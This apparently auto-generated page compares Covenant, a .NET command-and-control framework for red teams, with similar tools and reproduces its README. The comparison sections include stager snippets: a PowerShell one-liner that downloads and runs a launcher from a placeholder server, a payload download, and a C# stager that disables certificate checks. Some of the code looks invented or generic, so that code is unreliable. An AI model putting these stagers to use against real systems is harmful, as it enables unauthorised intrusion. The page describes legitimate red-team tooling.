Convert Figma logo to code with AI

cobbr logoCovenant

Covenant is a collaborative .NET C2 framework for red teamers.

4,137
766
4,137
86
View on GitHub

Top Related Projects

BC-SECURITY's avatar

Empire

4,168

Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.

Ne0nd0g's avatar

merlin

5,026

Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.

nettitude's avatar

PoshC2

1,777

A proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.

byt3bl33d3r's avatar

SILENTTRINITY

2,169

An asynchronous, collaborative post-exploitation agent powered by Python and .NET's DLR

BishopFox's avatar

sliver

8,207

Adversary Emulation Framework

Quick Overview

Covenant is an open-source .NET command and control framework that aims to highlight the attack surface of .NET, make the use of offensive .NET tradecraft easier, and serve as a collaborative command and control platform for red teamers. It provides a robust framework for conducting red team operations and penetration testing.

Pros

  • Highly customizable and extensible framework
  • User-friendly web interface for managing operations
  • Supports various communication protocols and encryption methods
  • Integrates well with other .NET-based tools and libraries

Cons

  • Requires knowledge of C# and .NET for advanced usage
  • May be detected by some antivirus software due to its popularity
  • Limited documentation for some advanced features
  • Steep learning curve for beginners in red teaming

Getting Started

To get started with Covenant:

  1. Clone the repository:

    git clone https://github.com/cobbr/Covenant

  2. Navigate to the Covenant directory:

    cd Covenant/Covenant

  3. Build and run the project:

    dotnet build
dotnet run

  4. Access the web interface at https://localhost:7443 in your browser.

  5. Create a new user account and start exploring the features.

Note: Ensure you have the .NET Core SDK installed on your system before running Covenant.

Competitor Comparisons

BC-SECURITY logo

Empire

4,168

Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.

Pros of Empire

  • More mature and battle-tested project with a larger user base
  • Supports a wider range of post-exploitation modules and techniques
  • Better integration with other popular security tools and frameworks

Cons of Empire

  • Less user-friendly interface compared to Covenant's modern web-based GUI
  • Steeper learning curve for beginners
  • Less frequent updates and maintenance in recent years

Code Comparison

Empire (PowerShell stager):

$wc=New-Object System.Net.WebClient;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';
$wc.Headers.Add('User-Agent',$u);$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;
$wc.Proxy.Credentials=[System.Net.CredentialCache]::DefaultNetworkCredentials;
IEX $wc.DownloadString('http://empire.server/launcher');

Covenant (C# stager):

using System.Net;
ServicePointManager.ServerCertificateValidationCallback = (sender, cert, chain, errors) => true;
string url = "https://covenant.server/launcher";
string user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36";
WebClient wc = new WebClient();
wc.Headers.Add("User-Agent", user_agent);

Both projects are powerful post-exploitation frameworks, with Empire offering more extensive features and a larger community, while Covenant provides a more modern and user-friendly experience. The choice between them depends on the user's specific needs and level of expertise in post-exploitation techniques.

Ne0nd0g logo

merlin

5,026

Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.

Pros of Merlin

  • Written in Go, offering better cross-platform compatibility and easier deployment
  • Supports multiple protocols (HTTP/1.1, HTTP/2, HTTP/3) and communication methods (DNS, SMB)
  • More active development and frequent updates

Cons of Merlin

  • Less user-friendly interface compared to Covenant's GUI
  • Fewer built-in post-exploitation modules and lateral movement capabilities
  • Steeper learning curve for operators new to command-line tools

Code Comparison

Merlin (server initialization):

// Initialize the server
server, err := servers.NewHTTPServer()
if err != nil {
    return err
}
server.Start()

Covenant (agent creation):

// Create a new GruntHTTP
var grunt = new GruntHTTP
{
    Name = name,
    ImplantTemplate = implantTemplate
};

Both projects focus on creating command and control (C2) frameworks, but their implementations differ significantly. Merlin emphasizes flexibility and cross-platform support, while Covenant provides a more comprehensive GUI-based solution with extensive built-in modules. The choice between them depends on the operator's preferences, target environment, and specific mission requirements.

nettitude logo

PoshC2

1,777

A proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.

Pros of PoshC2

  • Written in PowerShell, making it more lightweight and easier to customize for Windows environments
  • Includes built-in HTTPS comms and Proxy Aware communication
  • Offers a wider range of post-exploitation modules out-of-the-box

Cons of PoshC2

  • Limited cross-platform support compared to Covenant's .NET Core foundation
  • Less polished and intuitive user interface
  • Smaller community and less frequent updates

Code Comparison

PoshC2 (PowerShell):

$Proxy = [System.Net.WebRequest]::GetSystemWebProxy()
$WebClient = New-Object System.Net.WebClient
$WebClient.Proxy = $Proxy
$WebClient.DownloadString("https://example.com/payload")

Covenant (C#):

HttpClientHandler handler = new HttpClientHandler();
handler.UseDefaultCredentials = true;
using (HttpClient client = new HttpClient(handler))
{
    string result = await client.GetStringAsync("https://example.com/payload");
}

Both projects aim to provide post-exploitation frameworks, but PoshC2 focuses on PowerShell-based operations, while Covenant offers a more modern, cross-platform approach using .NET Core. PoshC2 may be preferable for Windows-centric environments, while Covenant provides a more versatile solution for diverse network infrastructures.

byt3bl33d3r logo

SILENTTRINITY

2,169

An asynchronous, collaborative post-exploitation agent powered by Python and .NET's DLR

Pros of SILENTTRINITY

  • Written in Python, making it more accessible for scripting and customization
  • Supports multiple communication protocols (HTTP, HTTPS, DNS)
  • Utilizes IronPython for .NET compatibility without requiring .NET framework

Cons of SILENTTRINITY

  • Less mature and potentially less stable than Covenant
  • Smaller community and fewer resources available
  • May have fewer built-in modules and features

Code Comparison

SILENTTRINITY (Python):

class STModule(cmd.Cmd):
    def __init__(self, prompt, description):
        cmd.Cmd.__init__(self)
        self.prompt = prompt
        self.description = description

Covenant (C#):

public abstract class GruntTask
{
    public string Name { get; set; }
    public string Description { get; set; }
    public string Author { get; set; }
    public bool IsHidden { get; set; }
}

Both projects implement modular structures for tasks or modules, but SILENTTRINITY uses Python's cmd module for command-line interfaces, while Covenant uses C# classes for defining task properties.

BishopFox logo

sliver

8,207

Adversary Emulation Framework

Pros of Sliver

  • Written in Go, offering better cross-platform compatibility and easier deployment
  • Supports multiple protocols (DNS, HTTP, MTLS, WireGuard) for C2 communication
  • Includes built-in evasion techniques and anti-forensics capabilities

Cons of Sliver

  • Less extensive GUI compared to Covenant's web-based interface
  • Smaller community and fewer available extensions/plugins
  • Steeper learning curve for users new to Go-based tools

Code Comparison

Sliver (Go):

func (rpc *Server) GetSessions(ctx context.Context, req *clientpb.Session) (*clientpb.Sessions, error) {
    sessions := &clientpb.Sessions{Sessions: []*clientpb.Session{}}
    for _, session := range core.Sessions.All() {
        sessions.Sessions = append(sessions.Sessions, session.ToProtobuf())
    }
    return sessions, nil
}

Covenant (C#):

public async Task<IActionResult> GetGrunts()
{
    List<Grunt> grunts = await this.GetConnectedGrunts();
    return Ok(grunts);
}

The code snippets show different approaches to retrieving active sessions/agents, with Sliver using Go's concurrency features and Covenant leveraging C#'s async/await pattern.

Convert Figma logo designs to code with AI

Visual Copilot

Introducing Visual Copilot: A new AI model to turn Figma designs to high quality code using your components.

Try Visual Copilot

README

Covenant Contributors Commit Activity Stars License Chat

Covenant is a .NET command and control framework that aims to highlight the attack surface of .NET, make the use of offensive .NET tradecraft easier, and serve as a collaborative command and control platform for red teamers.

Covenant is an ASP.NET Core, cross-platform application that includes a web-based interface that allows for multi-user collaboration.

Covenant Dashboard

Quick-Start Guide

Please see the Installation and Startup guide to get started with Covenant!

The Wiki documents most of Covenant's core features and how to use them.

Features

Covenant has several key features that make it useful and differentiate it from other command and control frameworks:

  • Intuitive Interface - Covenant provides an intuitive web application to easily run a collaborative red team operation.
  • Multi-Platform - Covenant targets .NET Core, which is multi-platform. This allows Covenant to run natively on Linux, MacOS, and Windows platforms. Additionally, Covenant has docker support, allowing it to run within a container on any system that has docker installed.
  • Multi-User - Covenant supports multi-user collaboration. The ability to collaborate has become crucial for effective red team operations. Many users can interact with the same Covenant server and operate independently or collaboratively.
  • API Driven - Covenant is driven by an API that enables multi-user collaboration and is easily extendible. Additionally, Covenant includes a Swagger UI that makes development and debugging easier and more convenient.
  • Listener Profiles - Covenant supports listener “profiles” that control how the network communication between Grunt implants and Covenant listeners look on the wire.
  • Encrypted Key Exchange - Covenant implements an encrypted key exchange between Grunt implants and Covenant listeners that is largely based on a similar exchange in the Empire project, in addition to optional SSL encryption. This achieves the cryptographic property of forward secrecy between Grunt implants.
  • Dynamic Compilation - Covenant uses the Roslyn API for dynamic C# compilation. Every time a new Grunt is generated or a new task is assigned, the relevant code is recompiled and obfuscated with ConfuserEx, avoiding totally static payloads. Covenant reuses much of the compilation code from the SharpGen project, which I described in much more detail in a previous post.
  • Inline C# Execution - Covenant borrows code and ideas from both the SharpGen and SharpShell projects to allow operators to execute C# one-liners on Grunt implants. This allows for similar functionality to that described in the SharpShell post, but allows the one-liners to be executed on remote implants.
  • Tracking Indicators - Covenant tracks “indicators” throughout an operation, and summarizes them in the Indicators menu. This allows an operator to conduct actions that are tracked throughout an operation and easily summarize those actions to the blue team during or at the end of an assessment for deconfliction and educational purposes. This feature is still in it’s infancy and still has room for improvement.
  • Developed in C# - Personally, I enjoy developing in C#, which may not be a surprise for anyone that has read my latest blogs or tools. Not everyone might agree that development in C# is ideal, but hopefully everyone agrees that it is nice to have all components of the framework written in the same language. I’ve found it very convenient to write the server, client, and implant all in the same language. This may not be a true “feature”, but hopefully it allows others to contribute to the project fairly easily.

Questions and Discussion

Have questions or want to chat more about Covenant? Join the #Covenant channel in the BloodHound Gang Slack.